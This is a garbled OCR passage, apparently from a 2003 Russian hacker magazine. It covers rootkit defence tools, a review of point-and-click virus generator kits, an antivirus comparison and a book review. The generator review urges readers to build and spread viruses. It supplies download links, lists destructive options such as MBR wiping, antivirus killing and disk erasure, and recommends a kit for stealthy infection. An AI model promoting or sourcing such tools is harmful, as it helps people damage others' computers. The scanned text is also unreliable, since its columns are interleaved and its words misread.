имеешь дело, полезно заглянуть на 
сайты по вирусологии. 


Помимо антивирусов существует мно- 
жество программ, нацеленных на обна- 
ружение всяческих изменений в систе- 
ме, в том числе md5-cyMMbI срайлов. 
Именно с помощью такого собрта поль- 
зователь может определить замену би- 
нарного срайла или задетектить нали- 
чие виря в системе. Наиболее распрост- 
раненной сосртиной подобного рода яв- 
ляется tripwire (http://download.source- 
forge.net/tripwire/tripwire-2.3.1-2.tar.gz). 


кую-либо cocp- 
Тину ИЗ этой OT- 
расли. Доста- 
точно восполь- 
зоваться сис- 
темной утили- 
той iptables. 


Чтобы обезопа- 
сить себя от 
воздействия 
бэкдоров и рут- 
китов, просто 
закроем все 
порты, оставив 
лишь систем- 
ные, на которых 
находятся дове- 


При установке надо запустить скрипт, 
который создаст первичную файловую 
базу. Именно с ней ежедневно будут 
сравниваться все изменения, а рут бу- 
дет получать несколько килобайт спа- 
ма на эту тему ;). 


От разного рода троянов помогает за- 
щита фаервола. Мпих-пользователям 
повезло - им не придется искать ка- 


ренные серви- 
сы. Итак, с помощью нескольких пра- 
вил, мы реально убережем систему от 
внешних (и внутренних) злоумышлен- 
ников. 


Таким образом, после правильной 
установки фаервола, подключиться 
к твоей машине на необъявленный 


порт становится невозможным. 


Таким образом, после правильной 
установки фаервола, подключиться 
к твоей машине на необъявленный 
порт становится невозможным. 
Вторым способом защиты от рутки- 
тов являются специальные програм- 
мы, нацеленные на детектирование 
заразы. Пример такой сосфтины - па- 
кет chkrootkit 
(ftp://ftp.pangeia.com.br/pub/seg/pac/ 
chkrootkit.tar.gz). Полезность этой 


Помимо ан- 
проги заключается в следующем: тивирусов 

. существует 
после запуска утилита проверяет ge СНЕ 
сфролтовые сигналы известных еи программ, 

2 нацеленных 
руткитов, затем ищет заразу в опре на обнару= 
деленных скрытых директориях и жение вся- 
сканит бинарные файлы на предмет ческих из- 

менений в 
заражения. После всего этого nonb- системе, в 
зователь получит полныи отчет о мая 
т@5-суммы 
работе программы. ато! 
Именно с 
И НАПОСЛЕДОК... Е 
Это далеко не все методы опре- та пользо- 
ватель мо- 


деления и защиты системы от виру- 


7 ет опреде- 
сов. Если учитывать, что вирусмей- жет onped 


лить замену 


керы не стоят на месте, а ищут все бинарного 

_ файла или 
новые способы незаметного зара АЕ 
жения системы, можно сделать вы- наличие ви- 
вод - абсолютной защиты не суще- ны CLR 


ствует. Остается лишь надеяться, 
что разработчики антивирусного ПО 
тоже не дремлют и своевременно 
обновляют свои базы, а также соз- 
дают методику лечения приложений 


от того или иного виря. aL 


Генераторы зла 
Обзор вирусных генераторов 


Поставь 
предохранитель 
Обзор антивирусов 


Книжная лавка 
Обзор книжных новинок 


Чтобы время не терять 
Обзор сети на наличие 
вкусных сайтов 


SPECial delivery | ГЕНЕРАТОРЫ ЗЛА В 


Еромалаев Евгений aka Saturn 


ГЕНЕРАТОРЫ ЗЛА 


ОБЗОР ГЕНЕРАТОРОВ ВИРУСОВ 


ногие юные хакеры хотят поскорее написать вирус и разослать его по 
М всему миру. Ты один из них? Тогда читай дальше. Если нет, все равно чи- 
тай - пригодится... Чтобы написать какой-нибудь мало-мальски вредный вирус, 
нужно изучить С, С++ и прочий ассемблер. Но это лишь один из вариантов. 
Другой заключается в том, что можно делать вирусы при помощи нескольких 
кликов мышью. Если ты после долгих раздумий решил пойти по второму пути, 
то добро пожаловать в мир вирусных генераторов и конструкторов. 


NEXT GENERATION VIRUS 

CONSTRUKTION KIT 

Все еще есть желание сгене- 

рить вирус, но ты не знаешь, 

чем пользоваться? Ну, тогда 

лови первого "создавателя" вирусов нового 
(как заверяют авторы) поколения. На самом 


Win9x/WinNT 


75 Кб 


http://vx.netlux.org/vx.php?id=tidx 


ртр аи Пе 


a ares Гы 
oe Lee | ванн 


on 


Fe ed Sen eeiengs eer 
heer Ja eee ee 
ee ey ee ee ee : 
| eee | ен па: ва 


Конструкторский набор for Next Generation | 


gene, NG Virus Construktion Kit представляет 
абсолютно новое gna такого рода программ 
(которые направлены на то, чтобы вырыть 
яму многочисленным соседям) качество. Дело 
в том, что большая часть генераторов созда- 
на таким образом, что разобраться в интер- 
фейсе может разве что сам разработчик. 
Здесь же в оптимальных пропорциях сочета- 
ются простота и функциональность. Этот ге- 
нератор позволит зашифровать вирус, чтобы 
он не попадался на глаза, причем сделать это 
можно разными способами. 

Можно заражать срайлы в системных дирек- 
ториях, причем размер заражаемых сайлов 
можно регулировать. Есть средства для конс- 
пирации. 

Hy и, естественно, вопрос о размножении TO- 
же решается. Как только все параметры выб- 
раны соответственно пожеланиям, наступает 
время для нажатия кнопки "Create". В об- 
щем, этот конструкторский набор - явный 
пример заботы о рядовом отечественном ви- 
русописателе, который ночей не спит ради 
создания более или менее сносного вируса, 
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но в то же время не хочет утруждать себя 
нудным программингом... 


NUKE RANDOMIC LIFE GENERATOR 


Ms-dos/Win9x/WinNT 


Size 
59 Кб 


http://h-zver.narod.ru/Soft/Virus/HACK- 
ZVEREvirus.htm 


Очень старая программа, но функций много 


Ну вот. Посмотрели на достижения поколе- 
ния Next, а теперь пришло время вспомнить 
"преданья старины глубокой". 

NuKE RANDOMIC LIFE GENERATOR - это са- 
мый старый в нашем обзоре генератор зла. 
Он был выдуман аж в 1994 году, но, тем не 
менее, это очень качественный продукт. Са- 


мое удивительное, что, несмотря на год вы- 
пуска, прога имеет очень простой, интуитив- 
но понятный интерфейс. С таким опусом 
можно наделать резидентных СОМ/ЕХЕ-ви- 
русов. Для этого выбирай пункт New Monster 
(неудобно без мыши, наверное). В нем нуж- 
ные тебе примочки в вирус. Включай какие 
хочешь - и вперед, в пункт Create. Выбира- 
ешь пункт Create, после этого программа 
создает cpann virus.asm. 

Остается только скомпилировать. Кстати, о 
примочках. Вот только некоторые из них: 
-Mbr bomb (пытается убить Главную загру- 
зочную запись) 

-Memory Stealth (прячется) 

-Kill antivirus (без комментариев) 

-Activation data 

Kak видишь, нынешний генератор почти ни в 
чем не пересекается с Next Generation Virus 
Construktion Kit. Поэтому использование од- 
ного из них не лишает возможности заю- 
зать и второй. Короче говоря, если не лома- 
ет пользоваться такой доисторической 
вещью, то попробуй - неплохая штука. 


Так закалялась сталь (на рисунке 

процесс создания файла типа *.а$ 
PETIK SCRIPT WORM AND VIRUS 
GENERATOR 


Win9x/WinNT 


http://vx.netlux.org/vx.php?id=tidx 


Seek. г Sa ele ee 


Дизайн "генератора" - сама простота 


Если интерфейс генераторов всякой 
вредоносной начинки будет упро- 
щаться так стремительно, как сейчас, 
то скоро либо Касперский станет бо- 
гатым, как Билл Гейтс, либо люди бу- 
дут убивать комп выходом в интернет. 
Вот такие мысли навеяло знакомство 
с PetiK Script Worm and Virus 
Generator. 

Есть программисты, которые пишут ге- 
ниальные программы, но не могут (не 
хотят) снабдить их понятным интер- 
рейсом. Но этот, видимо, пошел gpy- 
гим путем. Нарисовал 4 кнопки, но так 
и не придумал им достойного приме- 
нения. Его генератор делает VBS-yep- 
вя и "НТМЁ"-вирус. Червь ничего, кро- 
ме размножения, не делает, а вирус 
заражает несколько папок. 

Ну вот, в общем-то, и все, что можно 
сказать про эту прогу... 


Это все, что умеет делать PetiK Script 
Worm and Virus Generator (а какое при 
этом название гордое) 


ACCESS MACRO GENERATOR 


Win9x/WinNT 


Size 


106 Кб 


http://vx.netlux.org/vx.php?id=ta06 


Одинокое черное окно - вот и все, что, 


по мнению автора, требуется создателю 
вирусов... 


Представь себе, что в Сети появился 
вирус, который убивает всю инфу на 
винте. Разумеется, от него нет спасе- 
ния. Поэтому через пару-тройку дней 
работоспособные компьютеры остают- 
ся только у тех, кто успел купить пос- 
ледние "серые" форточки на Горбушке, 
и у создателя этого чуда вирусописа- 
ния. Так что если хочешь сохранить ин- 
ру на своем жестком диске, убей инфу 
на винте потенциального противника 
(во как). В этом тебе частично поможет 
конструктор под названием ACCESS 
MACRO GENERATOR. Прежде чем прис- 
тупить к описанию этого продукта, при- 
веду несколько строк из "документа- 
ции": "Имею честь представить Вам og- 
ну из самых удачных моих разработок, 
имя которой - АМС. В этом генераторе 
вы можете делать вирусы для ассез$97. 
На самом деле, АМС - это убийственный 
генератор, в том смысле, что почти все 
функции потенциальных вирусов (5 из 
6) заключаются в том, чтобы убить что- 
нибудь из информационных запасов 
бедного юзера. Единственная вещь, ко- 
торая не соответствует этому определе- 
нию и которую также можно добавить в 
вирус - это messagebox (achtung!!!)." 

Так что же конкретно можно сделать с 
помощью этой проги? Убить все фай- 
лы на диске, убить только dil, He оста- 
вить в живых мастдай или отправить в 
последний путь программные сфайлы. 
Резюме: этот генератор предоставля- 
ет множество способов извращения 
над жестким диском, но, к сожалению, 
ничего большего. И поскольку он соз- 


Велика мысль русского человека! 


дан делать вирусы под access97, то 
уже морально устарел. 

Р.5. Этот опус наотрез отказывается 
работать без Msvbvm50.dll, что He де- 
лает ему чести :). 


ELEKTRONNY PISATEL VIRUSOW 


Ms-Dos/Win9x/WinNT 
Size 
133 Кб 


http://vx.netlux.org/vx.php?id=teO2 


Тебе надоел английский интерфейс 
генераторов, перечисленных в обзо- 
ре? Хочется чего-нибудь родного, 
отечественного, на русском языке? 
Ну тогда ты правильно сделал, дочи- 
тав до конца. 

Итак, продукт отечественного гене- 
раторостроения - Электронный Писа- 
тель Вирусов - самая "весомая" сре- 
ди всех перечисленных программ. На 
мой взгляд, это лучший генератор 
вирусов. Такое количество примочек 
в программах подобного рода встре- 
чается очень редко. Выбираешь ти- 
пы файлов для заражения (СОМ, 
ЕХЕ или оба типа), можешь отказать- 
ся от того, чтобы вирус заражал win- 
Чо\/5-сфайлы (так палева меньше), 
количество файлов, зараженных за 
один раз, тоже можно выбрать. 


У этого генератора очень много 
возможностей. Можно, например, 
выбирать зону заражения... 


Есть даже такая вещь: если вирус пов- 
режден (!), то будет выдаваться строка, 
которую можно задать. Кроме того, 
можно поставить защиту от debug'a 
(хотя, по-моему, ее не мешало бы ста- 
вить автоматически), процедуру против 
Usafe. Можно также выбрать каталог 
для заражения (или весь винт). И это 
только часть возможностей этого вели- 
колепного генератора. Короче говоря, 
большой respect автору этой затеи за 
то, что создал такой качественный про- 
дукт и не дал втоптать в грязь славное 
имя российского программиста. 
Диагноз: очень рекомендую всем, 
кто хочет создать качественный ви- 
рус (насколько это возможно при ис- 
пользовании генератора), который 
без лишнего палева сделает свое 
грязное дело. 


Это все генераторы, которые я хотел 
представить в этом обзоре. Выбирай 
и пользуйся. Но помни, что сделать 
действительно новый вирус можно 
только собственными руками "с ну- 
ля". Так что assembler-foreva. 

В общем, дерзай... ПЕ 


NuKE ВАМ- 
DOMIC LIFE 
GENERA- 
TOR - это 
самый ста- 
рый генера- 
тор зла в 
нашем об- 
зоре. Но, 
тем не ме- 
нее, он об- 
ладает 
очень хоро- 
шим, интуи- 
тивно по- 
нятным ин- 
терфейсом, 
который 
даст фору 
многим сов- 
ременным 
генерато- 
рам. 
Выбирай 
пункт New 
Monster 
(неудобно 
без мыши, 
наверное). 
В нем нуж- 
ные тебе 
примочки в 
вирус. 
Включай 
какие хо- 
чешь - и 
вперед, в 
пункт 
Create. 
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аролик Андрей (andrusha@sl.ru) 


ПОСТАВЬ 
ПРЕДОХРАНИТЕЛЬ 


ОБЗОР АНТИВИРУСОВ 


е знаю ни одного ра- 


зумного друга, у кото- 


рого нет на компьюте- 


ре антивируса. Глупо 
отдавать себя на съе- 
дение этим мелким и ужасным 
монстрам - вирусам. К счастью, есть, 
чем прикрыть свой зад. Действи- 
тельно хороших антивирусов суще- 
ствует более чем достаточно, но рас- 
суждать, какой из них лучший - чис- 
той воды демагогия. Цель же этой 
статьи - обзор антивирусов, которые 
стоит использовать в регулярной 
уборке своего компьютера. А какой 
из них поставить - выбирай сам и 
пользуйся на здоровье. 


DOCTOR WEB (WWW.DRWEB.RU) 


Настоящий ветеран борьбы с 

вирусами, появившийся еще 
во времена DOS (тогда еще были ак- 
туальны дискеты 5,25 дюйма). Те- 
перь это полноценный 32-битный 
борец с вирусами, работающий в 
Windows 95/98/NT, 205/386, OS/2, 
Novell NetWare Linux и FreeBSD. 


Программа разделена на оболочку, 
ориентированную на конкретную ось, и 
ядро, не зависящее от среды обитания. 
Это удобно при использовании одной 
вирусной базы для разных осей, авто- 
матического пополнения вирусной ба- 
зы и обновлений оболочки и ядра. 


Дополнения к вирусной базе появ- 
ляются не реже одного раза в неде- 
лю (www.drweb.ru/get), при этом ты 
можешь ознакомиться с новыми 
поступлениями в деталях - 
www.drweb.ru/news. 
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KASPERSKY ANTIVIRUS 
(ANTIVIRAL TOOLKIT PRO) 
(WWW.AVP.RU) 


Один из самых популярных ан- 

тивирусов у нас и на западе. 
Прежде назывался AVP, но из-за 
частых подделок названия был 
позднее переименован в Kaspersky 
Antivirus. Есть версии для freeBSD 
Unix, BSDi Unix, Linux, Lotus Notes 
R5.02 и выше, OpenBSD, Palm OS, 
Solaris, Windows 
2000/95/98/CE/ME/NT/XP. 


Настоящий монстр по частоте об- 
новлений - два раза в день (около 6 
вечера и около 3 утра). Кроме этого 
есть еженедельные обновления и 
кумулятивные обновления - полное 
обновление комплекта антивирус- 
ных баз один раз в два-три месяца. 


Помимо поиска вирусов, имеющих- 
ся в антивирусной базе, умеет обна- 
руживать неизвестные вирусы бла- 
годаря технологии эвристического 
анализа второго поколения (к при- 
меру, позволил обнаружить разно- 
виодности вируса "ILOVEYOU"). He 
менее полезная фишка - контроль 
целостности данных. При обнаруже- 
нии вирусной активности (несанкци- 
онированные изменения в файлах 
или системном реестре) позволяет 
восстанавливать исходники и уда- 
лять вредоносные коды. 


Есть встроенный монитор реального 
времени, особенно актуальный для 
фильтрации электронной почты. Важ- 
но, что программа не только удаляет 
вирусы из тела письма, но и восста- 


навливает оригинальное содержимое. 


ESET NOD 32 
(WWW.NOD32.COM.AU) 


Австралийский вундеркинод, 

получивший множество прес- 
тижных наград за борьбу с вируса- 
ми. Работает nog Windows 
95/98/ME/NT/2k/XP, UNIX/Linux, 
Novell, MS DOS, Lotus Domino и т.д. 
Движок сканирующих модулей для 
всех платформ одинаковый. 


Монитор AMON (Antivirus МОМКог) 
запускается автоматически при заг- 
рузке системы и позволяет предо- 
твратить открытие и исполнение за- 
раженных файлов. Сохраняет ак- 
тивность даже в процессе выклю- 
чения системы (Shutdown). Сканиру- 
ет как локальные, так и сетевые 
диски. Умеет оперативно опове- 
щать через электронную почту по 
$МТР-протоколу. 


Для анализа трафика при сетевом 
подключении есть отдельный мо- 
дуль - IMON (Internet MONitor), рабо- 
тающий на уровне Winsock-a. Для 
анализа входящей почты использу- 
ется EMON (Email МОМКог), который 
подменяет собой стандартный POP3- 
фильтр. 


PANDA ANTIVIRUS PLATINUM 
(WWW.PANDASOFTWARE.COM) 


Аналог AVP, с встроенной тех- 

нологией эвристического ана- 
лиза, позволяющей опознавать и 
обезвреживать неизвестные виру- 
сы. При этом требования к ресурсам 
смешные: процессор 90 МГц, 32 Мб 
оперативной памяти и 20 Мб сво- 


бодного места Ha диске. Заточен под 
Windows XP/2k/NT/ME/98/95. 


Сами производители называют 
свое детище "поставил и забыл". 
Программа сама запускается при 
старте системы, сама все отслежива- 
ет, исправно рисует отчеты и запра- 
шивает через интернет обновления 
антивирусных баз. Доступны ежед- 
невные и кумулятивные (полностью 
вся антивирусная база) обновления. 


Встроенная технология SmartClean 
позволяет корректно обезврежи- 
вать зараженные сфайлы, восстанав- 
ливая поврежденную информацию. 
А модуль проверки входящей элект- 
ронной почты, что сейчас актуально, 
проверяет письма до того, как они 
будут открыты, исключая возмож- 
ность заражения через скрипты, ко- 
торые автоматически активизируют- 
ся при открытии писем. 


NETWORK ASSOCIATES MCAFEE 
VIRUSSCAN (WWW.MCAFEE.RU) 


Антивирусы семейства McAfee 

Security предназначены для 
комплексной антивирусной защиты, 
начиная от карманного или персо- 
нального компьютера go распреде- 
ленной сети. Работает с Windows 
95/98 /МЕ/МТ/2К/ХР, DOS, Macintosh, 
Novell Netware, FreeBSD, Linux, HP-UX, 
AIX, SCO, Solaris, MS Exchange, Lotus 
Notes/Domino, Palm OS, Windows 
CE/Pocket PC u EPOC (Psion). 


Среди других антивирусов выделя- 
ется своими наработками по защите 
сетей. Разработанный модуль 
ThreatScan не имеет аналогов и поз- 
воляет обнаруживать незащищен- 
ные, неуправляемые, зараженные 
или уязвимые машины в сети. В ре- 
зультате, позволяет предотвратить 
массовые эпидемии внутри сети. 
Открытые сетевые ресурсы могут 
явиться причиной повторных эпиде- 


Благодаря эвристическим технологиям 
Worm Blocking и Script Blocking черви не 
смогут пробраться на твой компьютер. 


ОНЛАЙН-ПОИСК 


мий типа Funlove или Nimda. Кроме 
того, ThreatScan своевременно реа- 
гирует на появление новых уязви- 
мостей благодаря автоматическому 
обновлению базы сигнатур. 


Другая интересная наработка - эв- 
ристический анализатор ViruLogic. 
Он определяет, насколько подозре- 
ваемая программа своим поведением 
напоминает вирус (к примеру, попыт- 
ка скрытой модификации срайлов). 
Если количество подозрительных 
действий превышает допустимый по- 
рог, то программа классифицируется 
как потенциальный вирус. По оцен- 
кам независимых тестов 
(www.mcafee.ru/av_tests) технология 
McAfee ViruLogic входит в число наи- 
более эффективных по обнаруже- 
нию неизвестных вирусов. 


SYMANTEC NORTON ANTIVIRUS 
(WWW.SYMANTEC.COM) 


Еще одна крупная забугорная 

компания, специализирующая- 
ся в области технологий по безопас- 
ности в интернете. Штампует раз- 
носторонний сост, в том числе и ан- 
тивирусы - последняя версия Norton 
AntiVirus 2003. Программа ориенти- 
рована Ha Windows XP/2k/Me/98. 


Интересна тем, что, помимо станда- 
ртных сункций антивируса, включа- 
ет разнообразные дополнительные 
функции: восстановление стертых 
или поврежденных данных, очистка 


Ш Если ты хочешь опробовать разные антивирусы, тебе совсем не 
обязательно их скачивать и устанавливать. Многие производители 
предоставляют на своих сайтах бесплатный сервис онлайн-поиска 
вирусов на компьютере, позволяя оценить эффективность своего 
движка. 


системы, защита критически важных 
файлов, фрагментирование ненуж- 
ных файлов для повышения KOHCpU- 
денциальности и т.п. Порой это 
очень удобно - не нужно устанавли- 
вать дополнительные программы, 
так как все есть в одной. 

Ш Подобное есть на www.drweb.ru, WWW.avp.ru и на многих других 
сайтах производителей антивирусов. Заходишь на сайт, выбира- 
ешь файлы для проверки на своем винте и вперед. Конечно, про- 
изводбители не дураки, и лечить найденные вирусы ты не сможешь. 
Зато для оценки эффективности антивируса подойдет в самый раз. 
Проверяешь свой компьютер разными движками, а лучший антиви- 


рус уже скачиваешь. 


Благодаря эвристическим технопо- 
гиям Worm Blocking и Script Blocking 
черви не смогут пробраться на твой 
компьютер и будут безжалостно 
уничтожены еще на подступах. В 
последнее время атаки червей нап- 
равлены в основном на почту, так 
как посредством ее они легко расп- 
ространяются по интернету. Так вот, 
обе технологии применяются при 
анализе входящей и исходящей поч- 
ты, блокируя даже еще не извест- 
ные разновидности червей. 


Ш! Но у подобного поиска есть и существенные ограничения. К при- 
меру, обычно размер проверяемого файла ограничен. А некоторые 
не позволяют проверять целые диски, директории и даже несколь- 
ко файлов. Да, наверное, проверять свой софт по одному файлику 
весьма занятно :). 


» 


ПОСТАВЬ ПРЕДОХРАНИТЕЛЬ В 


TREND MICRO PC-CILLIN 
(WWW.ANTIVIRUS.COM) 


Интересный гибрид антивируса 

с фаерволом (firewall) - PC-cillin 
2003, работает в Windows 
98/98SE/Me/NT/2000/XP. Именно 
совмещение антивируса и фаервола 
обеспечило этой программе непло- 
хое будущее. 


Фаервол позволяет эффективно 
отслеживать и фильтровать весь 
трафик, сводя на нет любые атаки 
извне на твой компьютер. Аналогич- 
но блокируются несанкционирован- 
ные обращения изнутри - ведь воз- 
можно, что у тебя уже сидит троян, 
управляемый гнусным сопливым ха- 
кером. Блокировать можно как пор- 
ты, так и запросы с определенных 
адресов. 


Учитывая новые тенденции, прог- 
рамма позволяет защитить компью- 
тер от атак при использовании в се- 
ти Wi-Fi. У нас это пока не актуально, 
но кто знает. 


Кроме того, этот антивирус умеет 
работать с PDA, используется в 
Palm, Pocket РС и ЕРОС. 


F-SECURE ANTI-VIRUS 
(WWW.F-SECURE.COM) 


Производитель предлагает два 

решения: F-Secure Anti-Virus 
2003 и F-Secure Internet Security 
2003. Первое - просто антивирус, 
второе - аналогично PC-cillin, с 
встроенным фаерволом. Поддержи- 
вает следующие платформы: 
Windows XP/ME/2000/NT/98/95. 


Фишка этой софтины - внешняя 
простота, совмещающая в себе 3cp- 
фективный движок, автоматическое 
обновление антвирусных баз и бе- 
зотказную работу. О многом говорит 
самая высокая оценка среди семи 
других тестируемых антивирусов, 
данная этому антивирусу шведским 
интернет-изданием 


ХАКЕРСПЕЦ 


10435) | 2003 


НАСТРОЙСЯ НА ЛУЧШЕЕ 


Почему-то широко распространено ошибочное мнение, что все за- 
висит от того, какой антивирус поставишь, а дальше как по маслу. 
Несомненно, важно, какой антивирус ты используешь, но не менее 
важно и то, как ты его настроил. Есть неписанные правила, которые 
актуальны для любого антивируса: 


Ш Обновляй антивирусные базы как можно чаще. Сканирование со 
старой базой - пробуксовка на месте. Не поленись зайти на сайт 
производителя и узнать, как часто доступны новые поступления. 
Порой это один из главных критериев при выборе антивируса при 
прочих равных. 

Ш Всегда используй возможности антивируса по максимуму. Да, 
работа замедлится, но шансы пропустить заразу будут сведены к 
нулю. В настройках выбирай сканирование всех файлов (любых 
форматов и размеров), почтовых баз и архивов. Если есть настрой- 
ка сложности анализатора кода - ставь на максимум! А вот вклю- 
чать реалтайм монитор или нет - вопрос спорный. Как мне кажется, 
достаточно регулярно проверять все и вся, не загружая ресурсы 
компьютера постоянным мониторингом. 

Ш Если что-то скачиваешь из интернета - сразу на проверку, еще 
go инсталляции. И не надейся на включенный монитор, он может 


элементарно запоздать или не сработать, все бывает. 


(http://sartryck.idg.se/Art/Virus3_iw3 
2003.html) в марте 2003 года. 


При поиске вирусов используется 
многомодульный движок, каждый мо- 
дуль занимается поиском вирусов 
только определенного типа. Это поз- 
воляет ускорить поиск и обеспечива- 
ет эфофективность его результатов. 
Каждый модуль использует эвристи- 
ческий анализ, позволяя отлавливать 
еще не известные вирусы или разно- 
видности уже существующих вирусов 
(последнее наиболее актуально). 


ALADDIN KNOWLEDGE SYSTEMS 
ESAFE (WWW.EALADDIN.COM) 


ЧЕ 


= _ 
— 


Еще один номинант - "Лучший ан- 

тивирус 2002 года" в РС Magazine 
(www.pcmag.com). Состоит из шести (!) 
модулей: антивирус, антивандал, защи- 
та от хакеров, антиспам, фильтр похож- 
дений по вебу и защита почты. Все 
шесть модулей очень эфорективны по 
отдельности, а вместе - просто ураган. 


Антивирус проверяет и лечит все, 
что только можно. Самое забавное, 
что в технологии Second Opinion (вто- 
рое мнение) применяется движок от 


Лаборатории Касперского, позволяя 
удвоить эффективность поиска и ле- 
чения разношерстных вирусов. BHeg- 
рение "второго мнения" было необхо- 
димо, так как собственный движок не 
спасал от некоторой нечисти, с кото- 
рой отлично справляется AVP, осо- 
бенно с разновидностями троянов. 


Антивандал - модуль, который отсе- 
кает всевозможные макровирусы, так 
популярные в Word'e, Ехсе!е и прочих 
"замечательных" программных про- 
дуктах от Майкрососрт. Кроме этого, 
модуль борется с нехорошими скрип- 
тами, которые встречаются на сайтах 
и в присылаемых письмах. 


Защита от хакеров представлена 
тремя технологиями: XploitStopper, 
Anti-hacking и Anti-spoofing. Из их 
названий уже понятно, что их 
действие направлено на пресечение 
любых DoS-atak, эксплоитов и попы- 
ток вторжения извне через сайты и 
электронные письма. 


Антиспам имеет множество настро- 
ек, по которым сфильтруется входя- 
щий трасрик: черный список, проверка 
DNS, блокировка по словам, блоки- 
ровка очевидного спама, проверка за- 
головков, анализ текста, сигнатур и 
многое другое. Мало не покажется :). 


COMMAND ANTIVIRUS 
(WwwWWw.COMMANDCOM.COM) 


Многоплатформенный антиви- 
рус, имеющий версии практи- 
чески для всех известных операци- 


ae # 


онных систем. Среди отличительных 
особенностей - динамическая защи- 
та (DVP, Dynamic Virus Protection), 
планирование, технология drag'n'- 
drop, администрирование сетей и 
технология Holocheck. 


Идея динамической защиты пре- 
дельно проста - при каждом обраще- 
нии к любым носителям в обяза- 
тельном порядке проверяется загру- 
зочный сектор. Планирование тоже 
очевидно - можно задавать день, 
время и периодичность сканирова- 
ния на наличие вирусов. 


Технология drag'n'drop - незамени- 
мая штука в быту. Если в остальных 


антивирусах, чтобы просканировать 
отдельный файл, нужно было ме- 
нять настройки задачи, то тут доста- 
точно мышкой кинуть подопытный 
файл поверх окна программы. 


Администрирование сетей спасает, 
если нужно отслеживать несколько 
машин, управляя всеми с одного 
компьютера, на котором будет отоб- 
ражаться, где и что случилось. И, на- 
конец, технология Holocheck npeg- 
назначена для комбинированного 
анализа по сигнатурам и внешним 
проявлениям файлов и процессов, 
эффективно определяя известные и 
неизвестные вирусы. 


COMPUTER ASSOCIATES 
INOCULATEIT (WWW.CAI.COM) 


Еще один комплексный продукт, 

обеспечивающий обширную за- 
щиту от вирусов - eTrust Antivirus. Pa- 
ботает nog Windows 
9x/Me/NT/2000/XP, Palm 
OS/PocketPC, Linux, Solaris, Macintosh, 


Этот софт можно использовать в каче- 

стве защиты по периметру локальной 

сети, используя как передаточное зве- 
но между интернетом 

и компьютерами в локалке. 


МИФЫ И РЕАЛЬНОСТЬ 


Ш Если за антивирус просят много зеленых фантиков и он хорошо 
известен - это совсем не значит, что он лучший. А ярым поклонни- 
кам какого-то одного антивируса стоит задать вопрос: "А какие 
еще антивирусы ты щупал? А сколько их существует в принципе? 
И читал ли ты спецвыпуск Хакера про Вирусы? :)". 

@ Ни один антивирус не защитит тебя от всех вирусов. Всегда есть 
вероятность, что какого-то нового вируса в базе еще нет. Это нор- 
мально. Были бы производители антивирусного ПО телепатами, ви- 
русы были бы неактуальны. Поэтому придерживайся проверенных 
дедовских методов: не качай где попало, не запускай что попало и 
не беги впереди паровоза - используй проверенные ресурсы. 

Ш Не все зараженные файлы могут быть вылечены. Но если ты Ha- 
верняка знаешь, какой вирус надругался над тобой, поройся в ине- 
те. Есть шанс, что ты найдешь утилитку или другой антивирус, ко- 
торые умеют лечить именно этот вирус (к примеру, у меня был слу- 
чай, когда McAfee смог вылечить то, что не лечил DrWeb). 

Ш Размер антивирусной базы ни о чем не говорит. Там может быть 
описание кучи доисторических вирусов и не быть описания наибо- 
лее опасных из последних экземпляров. Проверить эфеектив- 
ность можно следующим способом. Ставишь несколько антивиру- 
сов и по очереди запускаешь их на поиск вирусов, не применяя ле- 
чение к найденным вирусам. Потом сравниваешь, кто и что нашел. 
Ш Если антивирус очень долго копается, то это совсем не значит, что 
тормозит программа. Для глубокого и тщательного сканирования 
нужны ресурсы! И, наоборот, реактивный антивирус - сомнительное 
приобретение. Как говорится, тише едешь - дальше будешь :). 


Novell NetWare, Microsoft Exchange 
Server, Lotus Notes/Domino u Gateway. 


Для более надежной защиты парал- 
лельно используется два антивирус- 
ных движка, аналогично Aladdin'y, но 
оба разработаны своими силами. От- 
дельно отслеживаются и перехваты- 
ваются обращения к дфайлам с опре- 
деленными разрешениями, позволяя 
перехватывать вирусы "с поличным". 


Этот софт можно использовать в ка- 
честве защиты по периметру локаль- 
ной сети, используя как передаточное 
звено между интернетом и компьютера- 
ми в локалке, позволяя обезвреживать 
заразу до того, как она туда попадет. 


И самая полезная возможность - ис- 
пользование мощностей CA's eTrust 
TARGET (Threat Analysis and Response 
Global Emergency Team). Эта сеть 
предназначена для быстрого сбора 
информации о новых вирусах, червях, 
троянах и прочей нечисти. Информа- 
ция обрабатывается и оперативно рас- 
сылается, обеспечивая наиболее пол- 
ную информацию о новых вирусах. 


SOPHOS ANTI-VIRUS 
(WWW.SOPHOS.COM) 


Очередная забугорная разра- 

ботка, предназначенная для 32- 
битных платорорм и состоящая из двух 
компонент: собственно антивируса и 
технологии InterCheck, позволяющей 
перехватывать обращения к файлам, 
характерные для вирусов, обрабаты- 
вая источники этих обращений. В ре- 
зультате, сокращается время провер- 
ки на вирусы, так как проверяется не 
все подряд, а только те сайлы, кото- 
рые заподозрены в наличии вирусов. 


К интересным возможностям надо 
отнести оригинальный алгоритм рас- 
паковки исполнимых файлов "на ле- 
ту", что сокращает время сканирова- 
ния. К тому же можно работать с нес- 
тандартными форматами упаковки, к 
примеру, РСМ Раск. ac 
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КНИЖНАЯ ЛАВКА 


ОБЗОР КНИЖНЫХ НОВИНОК 


ТЕХНИКА 


ОПТИМИЗАЦИИ 


ПРОГРАММ. 


ЭФФЕКТИВНОЕ 
ИСПОЛЬЗОВАНИЕ 


ПАМЯТИ 


Автор: 

Крис Касперски 
Издательство: 
BHV 

Год издания: 
2003 


Техник я оптим 


програ 


Saget a них 


Крис Касперски - один из 

самых известных в России 
специалистов в области 
компьютерной безопасности, а 
также большой знаток ассемблера и 
компьютера в целом. Твоему 
вниманию предлагается книга, 
посвященная технике оптимизации 
программ. Многоуважаемый Крис 
поработал на славу, представив 
читателю уникальное практическое 
пособие по оптимизации программ 
под платформу IBM РС и 
операционные системы семейства 
Windows. Автор скрупулезно 
описывает архитектуру, философию 
и принципы функционирования 
оперативной и кэш-памяти. В книге 
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ты найдешь недокументированные 
секреты, существование которых 
компании Intel и Microsoft хотели бы 
утаить, множество оригинальных 
приемов программирования и 
готовых решений, перечень ошибок 
начинающих программистов, 
которые заметно снижают 
производительность системы. Если 
ты прочтешь эту книгу, твои друзья- 
вирмейкеры будут с замиранием 
сердца изучать код твоего вируса, 
написанный под чутким 
руководством Криса. 


СЕКРЕТЫ ХАКЕРОВ. 
БЕЗОПАСНОСТЬ WINDOWS 2000 
- ГОТОВЫЕ РЕШЕНИЯ 


Автор: 


Д.Скембрей, С.Мак-Клар 


Издательство: 
Вильямс 

Год издания: 
2002 


Читая каждый день BugTraq, 

ты сталкиваешься с 
